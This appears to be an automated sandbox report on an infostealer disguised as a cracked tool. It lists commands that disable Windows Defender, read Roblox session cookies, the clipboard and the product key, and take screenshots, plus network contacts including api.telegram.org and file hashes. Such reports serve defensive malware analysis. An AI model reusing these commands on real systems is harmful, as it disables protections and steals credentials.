C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe

bound.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start main.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgkvbgin\xgkvbgin.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57FE.tmp" "c:\Users\Admin\AppData\Local\Temp\xgkvbgin\CSC8FEAF05D191F4AD0858C536F835F62C5.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2416"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2416

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4624"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4624

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3928"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3928

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4220"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4220

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4756"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4756

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\J1fHz.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\J1fHz.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 13.107.42.16:443 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 blank-bno4d.in udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 199.232.210.172:80 tcp
US 8.8.8.8:53 88.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI18562\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI18562\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/2064-26-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI18562\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI18562\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI18562\blank.aes

MD5 7a959f835f18413a62817c2a945276ce
SHA1 3d77b773782ee5305486efed0286efe23f812443
SHA256 ac865b84b1fe0b4e117d77122501caa540b65ae6b3d7f1eed6fc3424cdf8709c
SHA512 4cb20a09c5f4dfb793e3dd30567d193b1744c74d3a93f54fddb2dab780ce4c466b140fa1234c738fddb7252603e60db3047424a1aab516f341057eebb8c799eb

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

memory/2064-50-0x00007FFD54610000-0x00007FFD5461F000-memory.dmp

memory/2064-49-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
